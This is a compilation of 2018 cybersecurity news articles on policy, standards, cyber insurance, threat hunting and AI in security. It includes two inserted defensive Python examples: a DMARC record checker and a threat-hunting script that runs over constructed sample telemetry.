It would be wrong, however, to suggest that the proposed certifications are completely without support. "I welcome any initiative to increase the security and assurance of ICT products," comments Ed Williams, director EMEA of SpiderLabs at Trustwave; "given the current climate this legislation is welcome... ICT products can be difficult and complex: ensuring that security is baked in could, initially, be difficult but is clearly the correct thing to do -- secure by design is a must in 2018 and moving forward. I, for one," he added, "hope that this certification framework is successful in raising what is currently a low bar. Good luck!"


Why Banning Risks to Cybersecurity Doesn’t Actually Improve Cybersecurity
5.7.2018 securityaffairs Cyber

There’s a prevailing mindset that suggests if organizations ban all the things that pose risks to overall cybersecurity, they’re taking the most effective approach to make their organizations secure.
Initially, that line of thinking seems sensible in some regards. After all, if the aspects that threaten cybersecurity aren’t allowed at all, the problems they pose could never crop up.

But, that belief is far too simplistic. Other interventions must occur to make cybersecurity a priority, whether it’s for specific websites or entire establishments.

1. Bans Could Limit or Prevent Access to Technology
Officials associated with the U.S. government are aiming to block Huawei components from entering the country’s marketplace if they’re used on communications equipment. The argument is that those parts compromise the nation’s security.

But, it’s a short-sighted approach since all the nation’s telecommunications providers already depend on equipment from Chinese manufacturers. Instituting a ban on goods from Huawei could prevent companies from getting federal funding that increases access to technology in communities with limited internet access.

Moreover, the economical prices associated with Huawei equipment make the items fit the budgets of small carriers that cannot afford pricier goods. If telecommunications providers no longer have the option to buy and use Huawei merchandise, the households and businesses in rural areas may have no means for getting internet access.

Instead of focusing on individual companies and prohibiting those from selling goods to companies in the U.S., it’s preferable for the country to develop a comprehensive national security strategy that’s not brand dependent.

2. Existing Cybersecurity Plans Generally Fall Short
A report from the U.S. State Department warned that it’s still easy to find cybersecurity vulnerabilities at public and private organizations despite increased investments meant to protect the respective networks.

A plan that only involves banning specific software titles or manufacturers isn’t robust enough because it’s not all-encompassing. Instead, organizations need to carry out intensive security audits and identify all the weak points in the networks and proactively try to minimize them.

In many cases, they can do this by implementing some of the most promising technological strategies. For example, context-based authentication and authorization use analytic data to calculate a risk score that determines whether to grant, deny or challenge a person’s access attempts.

Plus, if organizations attempt to ban software on workplace computers, that step might not be sufficient because so many people use mobile devices and apps to access workplace content from home, and their employers likely don’t know it’s happening.

3. Risks Are Not Always Apparent
It could take weeks or even months before organizations realize certain kinds of software may be detrimental to their overall cybersecurity strategies. That’s especially true because such findings are often discovered by diligent independent researchers who sound the alarm for the benefit of the public.

The Amazon Echo is one example of a gadget with software that’s had some gaping holes. In one instance, researchers illuminated an issue that could allow hackers to listen to, transcribe and transmit things people said after they used an Alexa skill that seemed legitimate.

Amazon quickly responded to the incident and fixed the problem. However, this case study proves it’s not always possible to tell whether software is risky or safe. People use Alexa daily without problems, but that doesn’t mean the software is trouble-free, nor that companies should rush to ban it.

If companies are too quick to disallow some kinds of software, they could prevent employees from accessing things at their workplaces that are genuinely helpful. In short, there is not a straightforward, fail-safe method for determining if a piece of software is safe or problematic. Even the most well-built software can have shortcomings.

4. We’re Living in a Global Economy
Wayne Jones, the chief information officer at the National Nuclear Security Administration, points out that instead of enforcing bans, the better approach to take is to figure out how to use software in ways that protect a company’s information.

He also brought up how we’re all living in a global economy, and that’s another reason why software bans don’t have the intended effect of bolstering cybersecurity.

The people who develop software and work on other tech-related projects often originate from foreign nations.

If the U.S. made a federal decision not to use equipment made by Huawei, would that ruling eventually progress to prevent anyone with past ties to the company from working for a United States business, then bar people from certain nations from taking tech-related jobs in the U.S.?

If so, the United States could find its tech development efforts substantially hindered, not to mention spend a significant amount of time determining which equipment features parts manufactured by countries on a theoretical “banned” list.

A Proactive Stance Is Essential
One thing people must remember is that cybercriminals tend to find ways to infiltrate systems even when doing so means overcoming obstacles. That means an outright ban on software — or anything else that might compromise cybersecurity — isn’t advisable.

Instead, organizations of all sizes must show proactiveness and learn to monitor for threats, counteract infiltration attempts and tighten their infrastructures when necessary.


UK Publishes Minimum Cyber Security Standard for Government Departments
28.6.2018 securityweek Cyber

The UK government's Cabinet Office has published the first iteration of its Minimum Cyber Security Standard, which will be incorporated into the Government Functional Standard for Security. The standard is mandatory for all government departments (which includes 'organizations, agencies, Arm’s Length Bodies and contractors'); but provides an excellent security checklist/framework for all commercial organizations.

It is a surprisingly short document (PDF); just seven pages comprising 10 sections under five categories: Identify, Protect, Detect, Respond and Recover. It largely follows the wider European approach of mandating outcomes rather than specific means to achieve those outcomes -- but is not entirely devoid of specific instructions.

For example, Section 6_d_iv includes, "You shall register for and use the NCSC's Web Check service." Web Check is part of the NCSC's Active Defense program. It is designed to check public sector websites for common vulnerabilities, and by this time last year was quietly scanning more than 1,200 government sites every day.

Other requirements include support for TLS v1.2, and the implementation of Domain-based Message Authentication Reporting and Conformance (DMARC) "to make email spoofing difficult".
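Publishing a DMARC record is not the same as making spoofing difficult: a record with `p=none` only reports. The following check is an added example, not part of the article or the Standard; the record strings and `.example` domains are constructed, and the verdict names are this example's own.

```python
# Added example: grade DMARC TXT records by how much spoofing they actually stop.
ENFORCING = {"quarantine", "reject"}
VALID_POLICIES = ENFORCING | {"none"}


def parse_dmarc(txt):
    """Return the record's tags as a dict, or None if it is not a DMARC record."""
    parts = [p.strip() for p in txt.split(";") if p.strip()]
    # The version tag must come first and must be exactly DMARC1.
    if not parts or parts[0].replace(" ", "") != "v=DMARC1":
        return None
    tags = {}
    for part in parts[1:]:
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags


def assess_dmarc(txt):
    """Return (verdict, findings) for one TXT value published at _dmarc.<domain>."""
    tags = parse_dmarc(txt)
    if tags is None:
        return "missing", ["TXT value is not a DMARC record (no leading v=DMARC1)"]
    policy = tags.get("p", "").lower()
    if policy not in VALID_POLICIES:
        return "invalid", ["p= must be none, quarantine or reject, got %r" % policy]

    findings = []
    subdomain_policy = tags.get("sp", policy).lower()  # sp defaults to p
    try:
        pct = int(tags.get("pct", "100"))              # pct defaults to 100
    except ValueError:
        pct = 100                                      # treated here as the default
        findings.append("pct= is not an integer")
    if "rua" not in tags:
        findings.append("no rua= address, so aggregate reports are never collected")

    if policy == "none":
        findings.append("p=none only monitors: failing mail is still delivered")
        return "monitor-only", findings
    if pct < 100:
        findings.append("pct=%d applies the policy to only part of failing mail" % pct)
    if subdomain_policy not in ENFORCING:
        findings.append("sp=%s leaves subdomains open to spoofing" % subdomain_policy)
    weak = pct < 100 or subdomain_policy not in ENFORCING
    return ("partial" if weak else "enforcing"), findings


# Constructed records for illustration; the domains are reserved example names.
SAMPLE_RECORDS = {
    "dept-a.example": "v=DMARC1; p=reject; rua=mailto:dmarc@dept-a.example",
    "dept-b.example": "v=DMARC1; p=none; rua=mailto:dmarc@dept-b.example",
    "dept-c.example": "v=DMARC1; p=quarantine; pct=25",
    "dept-d.example": "v=DMARC1; p=reject; sp=none; rua=mailto:d@dept-d.example",
    "dept-e.example": "v=spf1 -all",
}


def audit(records):
    """Map each domain to its verdict."""
    return {domain: assess_dmarc(txt)[0] for domain, txt in records.items()}


if __name__ == "__main__":
    for domain, txt in SAMPLE_RECORDS.items():
        verdict, findings = assess_dmarc(txt)
        print(domain, verdict, findings)
```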

Another requirement (6_d_i) is that departments must, "Ensure the web application is not susceptible to common security vulnerabilities, such as described in the top ten Open Web Application Security Project (OWASP) vulnerabilities." How that is ensured, like all requirements, is not specified.

For example, MFA is required (where feasible), but no specific factors or methods are described (7_b). It therefore allows for, but does not mention, evolving behavioral biometric factors.

This is by design. The document itself says, "As far as possible the security standards define outcomes, allowing Departments flexibility in how the standards are implemented, dependent on their local context."

This lack of detailed prescription is welcomed by Sanjay Kalra, co-founder and chief product officer at Lacework. "This is especially important for organizations that operate workloads in the cloud," he told SecurityWeek. "Where change is rapid and continuous; the appropriate cloud security measures require flexibility in their approach. In some ways, the Standard is similar in structure to GDPR, where the emphasis is on the outcome, but the guidelines for implementation allow for a common-sense approach that is flexible enough to allow for what works best for the organization.”

The publication is largely well-received by the security industry. Ilia Kolochenko, CEO of High-Tech Bridge (which offers its own web scanning service for both public and private industry), told SecurityWeek, "Simplicity and efficiency are successfully combined in the document. Today, many governmental entities don’t even know where and how to start cybersecurity, and this document will certainly help them structure and manage their digital risks and implement proper cybersecurity processes."

It’s also exciting to see, he added, "some simple, but clear and effective, technical requirements such as proper TLS encryption and obligatory testing of web applications for OWASP Top 10."

Matt Lock, director of sales engineers at Varonis, fears its simplicity is deceptive. "The minimum standards may sound simple on paper," he told SecurityWeek, "but even large organizations may struggle putting these steps into practice." Joseph Carson, Chief Security Scientist at Thycotic, adds, "As always, the questions for all of these standards will depend on the ability to enforce them.”

Carson also notes that securing the supply chain includes insistence that suppliers meet the UK Cyber Essentials level 6. He is somewhat concerned that the whole process could be "an indication that as the UK government prepares for the imminent Brexit, it is taking its own direction when it comes to cybersecurity. However, past incidents reveal that a cybersecurity strategy that does not extend beyond the country’s borders is doomed for failure as it assumes all cybercrime only occurs from within."

Matt Walmsley, EMEA director at Vectra, notes the document is focused on the detection of known and common threats and attacks. "The really advanced attackers are well-resourced and highly motivated. They will use previously unseen innovative attacks that use both legitimate tools and zero-day vulnerabilities and exploits which will bypass traditional signature-based defense and detection approaches."

By definition, he suspects that government departments will be targets for advanced attackers. "Given the UK government departments are likely targets for cyber-espionage, and politically motivated hacktivists as well as broader cyber-attacks, it is vital that they have the ability to detect and respond to advanced hidden attackers in short order, and with high efficacy.”

Mark Adams, regional VP, UK&I at Veeam Software, believes it is a great start for government, but government needs to do more to sell the standard across private industry. "What hope does a minimum cyber security standard have of being adhered to, outside of the government departments where it is made mandatory? Precious little, unfortunately... more must be done by the UK government to educate the private sector and make it realize that data protection and more secure data management is a necessity."

U.S. security experts have been quick to see the parallels between the UK standard and NIST's Cybersecurity Framework. “If you look at the HMG Security Policy Framework (SPF), referenced by the Minimum Cyber Security Standard," Anupam Sahai, VP product management at Santa Clara, Calif-based Cavirin, told SecurityWeek, "you’ll see that the overall structure is almost identical to the US NIST CSF -- and for good reason. The five primary functions – Identify, Protect, Detect, Respond, and Recover – are universal. Where the HMG SPF needs to go next is to map the high-level guidance to the more detailed UK-specific references, as they are mapped in the CSF. In parallel," he adds, "the UK has launched an Active Cyber Defense program, which in fact could serve as a template for the US.”

Lock also makes a comparison with the NIST framework. "The NIST Framework emphasizes the protection of data, provisioning access to a least-privilege “eyes-only” model, and continuous improvement among other key areas. And like the U.S. model, the Standard calls for continuous improvement, as organizations must be ready for the next attack.”

All told, the general consensus is favorable. The Minimum Security Standard is mandated for government, but also provides a valuable framework for private industry -- paralleling NIST in the U.S. Kolochenko sees even further value. "The UK," he said, "serves a laudable example on how cybersecurity can be and should be managed on a governmental level, that many other European countries can follow.”


House Passes Bill to Enhance Industrial Cybersecurity
27.6.2018 securityweek Cyber

The U.S. House of Representatives on Monday passed a bill aimed at protecting industrial control systems (ICS), particularly ones used in critical infrastructure, against cyberattacks.

The legislation, H.R. 5733, formally known as the “DHS Industrial Control Systems Capabilities Enhancement Act,” was introduced on May 9 by Rep. Don Bacon (R-NE) and it was approved by the House Committee on Homeland Security on June 6. The bill was announced a few weeks after the United States officially accused Russia of attempting to take control of critical infrastructure systems.

The new bill amends the Homeland Security Act of 2002 and requires the DHS’s National Cybersecurity and Communications Integration Center (NCCIC) to identify and mitigate threats and risks to ICS technologies and products used in critical infrastructure organizations.

The bill also requires NCCIC to maintain cross-sector incident response capabilities for ICS-related events, and provide technical assistance to end-users, product manufacturers, and other stakeholders in identifying and mitigating vulnerabilities in industrial control systems.

The agency is also required to provide the ICS community information on vulnerabilities based on collaboration with security researchers, manufacturers and industry end-users. The DHS will have to brief Congress every six months over the next four years.

The Congressional Budget Office (CBO) estimates that enacting this piece of legislation would cost less than $500,000 over the 2019-2023 period due to the fact that NCCIC already provides assistance to critical infrastructure operators and control system vendors, and the bill would only codify the agency’s responsibilities without imposing any new operating requirements.

“The next ‘Pearl Harbor attack’ will not be with missiles and torpedoes alone, but will be paired with attacks to our private sector functions needed to support our daily lives, such as our electric grid,” said Rep. Bacon. “DHS provides critical support to operators of industrial control systems (ICS), and my bill clarifies this responsibility so the Department can continue to identify and address threats to ICS in critical infrastructure. Any disruption or damage to critical infrastructure has the potential to cause catastrophic consequences to our nation’s public health and safety, economic security, and national security.”


EU States to Form 'Rapid Response' Cyber Force: Lithuania
26.6.2018 securityweek Cyber

Nine European Union states are to create rapid response teams to counter cyber attacks within the framework of a new EU defence pact, project leader Lithuania announced on Thursday.

"Nine states have agreed to join. The goal is to create rotational EU cyber rapid response teams," Defence Minister Raimundas Karoblis told AFP.

He said his counterparts from Croatia, Estonia, the Netherlands and Romania will join him on Monday to sign the agreement in Luxembourg while Finland, France, Poland and Spain will join later this year.

Teams formed by pooling experts on a rotational basis will be ready to help national authorities to tackle cyber attacks, with the schedule to be approved next year, Karoblis said.

The minister said he expected the EU to allocate funds for software and other equipment, adding that talks with EU institutions will continue about legal and technical aspects.

The cyber force will be among the first joint projects launched under a landmark EU defence pact signed last year.

The EU's move to establish the Permanent Structured Cooperation on security and defence, known as PESCO, was driven in part by US President Donald Trump's questioning of NATO's relevance and Britain's departure from the bloc.

Lithuania, a lead nation of the cyber defence project, has boosted its cyber capabilities in recent years to tackle what it describes as "hostile cyber activities" from nearby Russia, mostly targeting state institutions and the energy sector.


June 12 2018 Historic Edition of Cyber Defense eMagazine Has Arrived. Over 150 pages…
14.6.2018 securityaffairs  Cyber

June 12, 2018 – Cyber Defense eMagazine has arrived – OVER SIX THOUSAND PAGES – SIX YEARS – #1 GLOBAL SOURCE FOR CYBER DEFENSE
Cyber Defense eMagazine
June 2018 Edition has arrived.

We hope you enjoy this month’s edition…packed with over 150 pages of excellent content. InfoSec Knowledge is Power. We have 6 years of eMagazines online with timeless content. Visit our online library by clicking here. Please tell your friends to subscribe – no strings, always free emagazines:

FLIPBOOK

http://www.cyberdefensemagazine.com/newsletters/june-2018/index.html

PDF

http://www.cyberdefensemagazine.com/newsletters/june-2018/CDM-CYBER-DEFENSE-eMAGAZINE-June-2018.pdf

MOBILE

http://www.cyberdefensemagazine.com/newsletters/june-2018/mobile/index.html

Our InfoSec awards are annually given out at the RSA Conference in the United States every year, Q1. USA 2018 Awards – CLOSED.

Congratulations to our InfoSec Awards 2018 Winners!

WANT TO SEE THE 200 INNOVATORS THAT MADE THE CUT THIS YEAR?

CLICK THIS LINK, HERE.

Our Global Awards are annually given out at the IPEXPO Conference as a global event in Europe every year, Q4. GLOBAL 2018 Awards – OPEN. Click here to apply.

MAGAZINES TV AWARDS and more platforms under development…

Sincerely,

TEAM CDM

Cyber Defense Magazine

P.S. Thanks to our awesome sponsors – media kits available here.

We are all things Cyber Defense. Thank you to our amazing readership!



AXA Partners With SecurityScorecard to Set Cyber Insurance Premiums
7.6.2018 securityweek Cyber

AXA Will Use Ratings From SecurityScorecard to Help Set Premiums for Insurance Agreements

Cyber insurance is a problem. It is a new industry with huge potential but great difficulties. Getting premiums right is an example -- the cyber insurer needs to fully understand the financial risk it incurs in order to set premiums high enough to cover the risk and still make a profit, but low enough not to kill the market.

Steve Durbin, managing director of the Information Security Forum, describes the problem. "We have already seen that the financial impact of some information security risks is being transferred through cyber insurance," he told SecurityWeek.

"However, moving forward, I anticipate that several large data breaches will expose aggregated risks and cause insurers to suffer significant financial losses. As a result of this mispricing debacle, several insurers will be forced out of business while others will raise premiums significantly, expand contract exclusions and restrictions, or avoid cyber insurance altogether. This will make cyber insurance no longer financially viable for many organizations, and the market will contract and take several years to recover."

Quite simply, data breaches are happening with increasing frequency (another 92 million passwords exposed by MyHeritage this week). At the same time, the cost of recovery continues to escalate rapidly, and the quantity and severity of cyber regulations, such as GDPR, is expanding.

The insurance industry traditionally relies on actuarial tables -- effectively a database of experience -- to set its premiums. While insurance companies are currently busy compiling such data on historical breaches, they have nothing like the depth of, for example, motor insurance actuarial tables.

"Currently, most policy premiums are based on self-assessments," comments Greg Reber, CEO at consulting firm AsTech. This leads to its own problems. False assessments, even unintentional errors, could lead to reduced payouts in extremis. It is a strange irony that the best premiums will only be obtainable by the organizations that least need to transfer their risk to the insurance industry. At the same time, any companies that seek to rely on insurance alone to handle their risk are likely to come unstuck.

SecurityScorecard and AXA (the world's largest insurance company) believe they have found a solution to the premium problem. SecurityScorecard is a firm that rates the cybersecurity posture of web-enabled firms. It does not wait to be asked -- and the result is a growing database of independent security ratings on the world's web-enabled businesses. Currently, it continuously monitors more than 200,000 businesses and gives them a security score from A to F. Empirical evidence suggests it works: "Companies that rate as a D or F are 5.4 times more likely to be breached than companies that rate as an A or a B," claims the company.

AXA has now entered an agreement with SecurityScorecard to have access to these ratings, and will use them to help set the premium for its insurance agreements. "The SecurityScorecard platform," explains Scott Sayce, global chief underwriting officer of cyber at AXA, "will help us rapidly evaluate companies to understand their cyberhealth and provide our underwriters with crucial information needed to evaluate an insured's risk.”

"AXA and SecurityScorecard are pioneering the cyber insurance industry,” adds Aleksandr Yampolskiy, CEO and co-founder at SecurityScorecard. "This partnership demonstrates the value of the SecurityScorecard platform and the trust top business leaders have in our score. Our vision is to create a ubiquitous language for cybersecurity that facilitates collaboration and communication between business partners.”

Rather than relying on subjective, manual self-assessments from the customer, "They're going to be using the objective, automated, security metrics that we provide to make their insurance decisions," Yampolskiy told SecurityWeek. "They will feed that data into their algorithms and then decide, do I increase the premium because the customer's security posture looks risky, do I lower the premium, or maybe in some cases do I just flat out refuse to provide the cyber insurance?"

Our data, he continued, provides "objective measurements to create the scientific basis for making those insurance decisions. AXA plans to start underwriting thousands and thousands of European businesses." It is the small to medium sized business that most needs cyber insurance. "If you're an Equifax or a Target and you get hacked," continued Yampolskiy, "you might survive. But if you're a small company, you will not. So, AXA is planning to start using our technology to start making those cyber insurance policies that apply to thousands of those businesses." The advantage for those small businesses is they will be able to realistically set premiums, but will also learn their SecurityScorecard rating. "And that provides a lot of reciprocal benefit," he added.

Will this relationship be enough to kickstart a serious cyber insurance industry? It will probably happen anyway, but it may take time if left to its own devices. SecurityWeek asked Yampolskiy if cyber insurance might join the ranks of other insurances that are required by law.

"My belief is, yes," said Yampolskiy, "at some point in the future. We've reached the point where all companies are part of a larger interconnected ecosystem." He raised the example of Target, a large company breached through a small member of its supply chain. Target lost millions of dollars because of a smaller company, that would not of its own resources be able to provide recompense. "It's hard to predict the future," he said, "but I can see a time when all companies are required to have cyber insurance."

By providing a scientific basis for the insurance industry to use for premium-setting, Yampolskiy believes SecurityScorecard and AXA are moving the market toward the time when cyber insurance is not merely standard, but possibly required.

SecurityScorecard is based in New York. It was founded in 2013, and raised $12.5 in Series A funding led by Sequoia Capital in 2015; $20 million Series B in 2016; and $27.5 million Series C in 2017. Its stated mission is "to empower every organization with collaborative security intelligence."


How Threat Hunters Operate in Modern Security Environments
7.6.2018 securityaffairs Cyber

Cyber security – With millions of new malware surfacing on the internet every year, threat hunters need to be ever more ready and at the top of their game to ensure that their organization can remain safe and protected from all cyber threats.
Cyber security is a universe of its own. It has its own unique domains and its fair share of challenges that cyber security experts face every day. Of late, a new term has surfaced on the internet: threat hunter. The role of a cyber security threat hunter is rapidly becoming more important with each passing day.

In 2017, the number of cyber-attacks that took place just across the US was almost 50% higher compared to the previous year. And this year is no different. According to a recent survey conducted by Crowd Research Partners, “the number of threats in the cyber space have continued to double each year”.

While millions of businesses are facing threats from cyber criminals, the wise ones are busy recruiting, training, and equipping their cyber security threat hunters with sophisticated tools and equipment required to fight the online malice.

Naturally, the ones who are uncertain about what a cyber-security threat hunter is supposed to do, are looking for avenues to get their hands on the skill. This article will help you get a basic understanding related to most aspects of threat hunters and how they work in modern security environments.

Job Description, Skills and Qualifications of a Threat Hunter
A network threat hunter starts his research by assuming that the network has already been breached. The assumption is that, even though tools such as VPNs (recommended ones are PureVPN, PIA & Ivacy) and other server protections are in place, an intrusion sophisticated enough to bypass the VPN and other security measures has already taken place.

A threat hunter needs to have a proactive approach while scanning all the networks and servers for possible breaches or intrusions. He also needs to be very creative in terms of understanding anomalies and slightly abnormal happenings or instances going on over a network.

When it comes to technical knowledge, threat hunters need to be at the top of their game. Only when they understand the depths of how a network functions and how data flows through it can they spot issues such as data being leaked or, worse, getting hijacked by someone else.

Lastly, a network threat hunter needs to know the SOPs that are prescribed by the organization he is working at, along with the SOPs of the cyber security industry. Only when he fully knows the culture that is expected to be religiously followed will he be able to create exceptions and detect threats which no eyes have ever seen before.

Understanding Dynamics of Modern Security Environments
The threats that modern security environments face are evolving every day. It is only logical to state that the tools and procedures in use today will soon become obsolete and get replaced with new tools and tech. Consequently, organizations that are concerned about keeping their networks and digital environments secure need to be constantly moving toward adopting new tools and techniques.

This may not guarantee ultimate safety, but will definitely play a crucial role in keeping the organizations at least at par, if not a step ahead, with the growing threats in the online space.

How Threat Hunters Operate In Modern Security Environments?
In 2016, it was reported by G Data Software that 6.8 million new malware specimens surfaced on the internet. A year later, this number rose to 7.1 million. Looking at this trend, it is very clear that the coming years are going to be no easier on the threat hunters. In fact, it emphasizes the importance of training threat hunters and preparing them for the most unexpected.

Of the 7.1 million new strains of malware that were discovered in 2017, obviously not all of them would be dangerous. However, identifying the few dangerous ones is what determines if a digital environment is secure or not. This is where threat hunters contribute to keeping the networks secure.

A threat hunter identifies threats which AI systems may have missed. They do so by focusing on the shortcomings of their organizational security architectures, which fail at preventing threats from gaining entry into the digital environment.

How to Conduct a Threat Hunt
Outsource or DIY
The first step to efficiently conduct an organization-wide threat hunt is to determine if it can be carried out by the in-house security team. In that case, it is important to allocate dedicated resources and equipment to the threat hunters.

If, for any reason, the in-house team lacks the acumen for such a task, or if the security team is held back by resource or time constraints, the safer option is to outsource it.

Focus on Key Areas and Make a Plan
It is crucial to treat threat hunting as a pre-planned process, and not as an ad hoc task. Creating a proper plan and defining procedures that should be followed throughout the threat hunting process will play a crucial role in making the efforts bring a positive impact.

With a plan and a schedule in place, the tasks of the threat hunting team can be kept from interfering with those of other teams. Furthermore, the schedule can also help in pre-determining the order of tasks that are to be executed. This will allow threat hunters to operate smoothly and effectively, while keeping track of all the tasks that have been accomplished and the ones that need attention.

Produce a Hypothesis
Beginning with the end in mind makes it easy to plot your journey and know for sure when a task is completed. When hunting threats, the team should determine what it is looking for and what it wants to find. For example, in this case, the threat hunters should determine beforehand that they are looking for malware, or intruders who may have hacked the system.

Knowing what exactly to look for makes it easy to find it if it is there, or know when to stop the search in case there are no threats. If a hypothesis is not present, the search for threats may become endless and threat hunters will never be certain about when to stop.

Gather Crucial Information and Data
There is a lot to do when it comes to organizing all the available information and data. If the data is not organized, it is useless, as it becomes almost impossible to find what’s needed at the right moment. The data that threat hunters will collect and organize can include process names, command line files, DNS queries, destination IP addresses, digital signatures, etc.

If all this information is available but not sorted in a manner which is easy to sift through, threat hunters may take a lot of time for just finding the right information, and then additional time for utilizing the data for their processes. Such an approach can inflate budgets and resources used in threat hunting, damaging the overall productivity of the threat hunting team.

Task Automation
Without the help of AI and task automation, it would be impossible to keep up with the ever-growing cyber threats. Even though a human eye is very much needed, without automation the thousands of new threats and malware that surface on the internet every day will go unnoticed.

Threat hunters need a combination of people who are exceptionally good at what they do and artificial intelligence that has been built precisely for finding threats to modern security environments and sensitive networks.

Execution
That being said, there is no such thing as a perfect tool or a perfect procedure that a threat hunter can follow to eliminate threats from a modern security environment. It is always a continuous struggle between the online threats that keep getting better each day and the innovation required of threat hunters to stay one step ahead of the cyber-attacks.
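The steps above (state a hypothesis, organize the collected data, automate the search, know when to stop) can be seen in one small hunt. This is an added example, not code from the article; the events, host names, domains and the specific hypothesis are constructed, and the field names are assumptions of the example.

```python
# Added example: a hypothesis-driven hunt over constructed endpoint telemetry.
from collections import defaultdict


def ev(host, process, cmdline, signed, dns, dest_ip):
    """One telemetry record with the fields named in the article."""
    return {"host": host, "process": process, "cmdline": cmdline,
            "signed": signed, "dns": dns, "dest_ip": dest_ip}


# Constructed sample data (documentation IP ranges, reserved example domains).
EVENTS = [
    ev("ws-01", "chrome.exe", "chrome.exe --type=renderer", True,
       "intranet.example.com", "192.0.2.10"),
    ev("ws-02", "chrome.exe", "chrome.exe --type=renderer", True,
       "intranet.example.com", "192.0.2.10"),
    ev("ws-03", "chrome.exe", "chrome.exe --type=renderer", True,
       "intranet.example.com", "192.0.2.10"),
    ev("ws-01", "teams.exe", "teams.exe", True,
       "cdn.example.net", "198.51.100.7"),
    ev("ws-02", "updater.exe", "updater.exe /silent", False,
       "cdn.example.net", "198.51.100.7"),
    ev("ws-01", "backup.exe", "backup.exe --nightly", True,
       "vault.example.org", "198.51.100.20"),
    ev("ws-03", "svch0st.exe", "svch0st.exe -k netsvc", False,
       "a9f3.example.org", "203.0.113.55"),
    ev("ws-03", "svch0st.exe", "svch0st.exe -k netsvc", False,
       "a9f3.example.org", "203.0.113.55"),
]


def build_index(events):
    """Organize raw events once so the hunt is a series of lookups."""
    by_process = defaultdict(list)      # (host, process) -> its events
    hosts_by_domain = defaultdict(set)  # domain -> hosts that resolved it
    for e in events:
        by_process[(e["host"], e["process"])].append(e)
        hosts_by_domain[e["dns"]].add(e["host"])
    return by_process, hosts_by_domain


def hunt_unsigned_rare_dns(events, max_hosts=1):
    """Hypothesis: an unsigned binary resolves a domain that at most
    `max_hosts` machines in the fleet ever resolve.

    The result states whether the hypothesis was supported, which gives the
    hunt a defined stopping point even when nothing is found.
    """
    by_process, hosts_by_domain = build_index(events)
    hits = []
    for (host, process), evs in sorted(by_process.items()):
        if all(e["signed"] for e in evs):
            continue  # signed binaries are out of scope for this hypothesis
        rare = sorted({e["dns"] for e in evs
                       if len(hosts_by_domain[e["dns"]]) <= max_hosts})
        if rare:
            hits.append({
                "host": host,
                "process": process,
                "cmdlines": sorted({e["cmdline"] for e in evs}),
                "domains": rare,
                "dest_ips": sorted({e["dest_ip"] for e in evs
                                    if e["dns"] in rare}),
            })
    return {"hypothesis": "unsigned process resolving a fleet-rare domain",
            "supported": bool(hits), "hits": hits}


if __name__ == "__main__":
    result = hunt_unsigned_rare_dns(EVENTS)
    print(result["hypothesis"], "->", "supported" if result["supported"]
          else "no evidence, hunt closed")
    for hit in result["hits"]:
        print(hit)
```

The unsigned `updater.exe` is not reported because its domain is also resolved by another host, and the rare domain used by the signed `backup.exe` is outside the hypothesis; each would need its own hunt.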

AI and the Future of Cyber Threat Hunting
One of the fastest-evolving tools in recent times is artificial intelligence and machine learning, which has been helping threat hunters reduce the amount of time they spend on detection, prevention and fixing issues. It also helps to improve the efficiency of the measures that the threat hunters take.
However, some people believe that as AI gets better, it will replace the need for having human threat hunters. We believe that will never be the case. This is due to two reasons.

Primarily, AI is a developing technology, which is available to both sides, the good and the evil. Moreover, some analysts even suggest that future cyber threats will be created and propagated using AI and even blockchain for creating a much wider impact.

Secondly, AI is a tool created by humans. Even though it is very efficient in terms of analyzing all options at the same time and taking the best decision, it may never be able to outpace the creativity and innovation that the human mind is capable of. AI may come in very handy for implementation and research purposes, but for now, the humans will lead the show with their own creativity and critical thinking.


The Current Limitations and Future Potential of AI in Cybersecurity
31.5.2018 securityweek  Cyber

A recent NIST study shows the current limitations and future potential of machine learning in cybersecurity.

Published Tuesday in the Proceedings of the National Academy of Sciences, the study focused on facial recognition and tested the accuracy of a group of 184 humans and the accuracy of four of the latest facial recognition algorithms. The humans comprised 87 trained professionals, 13 so-called 'super recognizers' (who simply have an exceptional natural ability), and a control group of 84 untrained individuals.

Reassuringly, the trained professionals performed significantly better than the untrained control groups. Surprisingly, however, neither human experts nor machine algorithms alone provided the most accurate results. The best performance came from combining a single expert with the best algorithm.

"Our data show that the best results come from a single facial examiner working with a single top-performing algorithm," commented NIST electronic engineer P. Jonathon Phillips. "While combining two human examiners does improve accuracy, it's not as good as combining one examiner and the best algorithm."

"The NIST study used a form of deep learning known as convolutional neural networks that has been proven effective for image recognition because it performs comparative analysis based on pixels rather than the entire image. This is like looking at the individual trees rather than the forest, to use a colloquialism," explains Chris Morales, head of security analytics at Vectra.

The question asked by the NIST researchers was how many humans or machines combined would lead to the lowest error rate of judgement when comparing two photos to determine if they are of the same person -- with no errors being a perfect score. The outcome of their research was that combining man and machine produces a higher rate of accuracy for a single worker, which resulted in higher productivity. This result occurred because man and machine have different strengths and weaknesses that can be leveraged and mitigated by working together.

"What the researchers found," continued Morales, "was the best machine performed in the same range as the best humans. In addition, they found that combining a single facial examiner with machine learning yielded a perfect accuracy score of 1.0 (no errors). To achieve this same 1.0 accuracy level without machine learning required either four trained facial examiners or three super recognizers."

If these results are typical across the increasing use of artificial intelligence (AI) in cyber security -- and Morales believes the study is representative of the value of AI -- it implies we are rapidly approaching a tipping point. Right now, algorithms are not significantly better than trained professionals, but if used by a trained professional they can improve performance and reduce required manpower levels.

While AI itself is not new, it has grown dramatically in use and capability over just the last few years. "If we had done this study three years ago, the best computer algorithm's performance would have been comparable to an average untrained student," NIST's Phillips said. "Nowadays, state-of-the-art algorithms perform as well as a highly trained professional."

The implication is that we are not yet ready to rely solely on the decisions of machine learning algorithms, but that day is surely coming if algorithm quality continues to improve. We have, however, already reached the point where AI can decrease our reliance on human resources. The best results came not from a team of experts combined with machine learning, but from a single professional working with the best algorithm.

"It is often the case that the optimum solution to a new problem is found with the combination of human and machine," comments Tim Sadler, CEO and co-founder of machine learning email security firm Tessian. "However, as more labelled data becomes available, and more researchers look into the problem, machine learning models generally become more accurate and autonomous reducing the need for a human 'operator'. A good example of this is medical imaging diagnosis where deep learning models now greatly outperform radiologists in the early diagnosis of cancerous tissues and will soon become the AI 'silver bullet'."

He doesn't believe that facial recognition algorithms have reached that stage yet.

"Facial recognition technology is fairly new, and although machine learning is quickly disrupting the industry clearly the technology is not perfect, for example there have been instances where facial recognition technology has authenticated through family likeness," Sadler said. "It will take years of close partnership between facial recognition experts are their machine learning counterparts working together, with the experts overriding the machine's mistakes and correctly labelling the data before a similar disruption is seen."

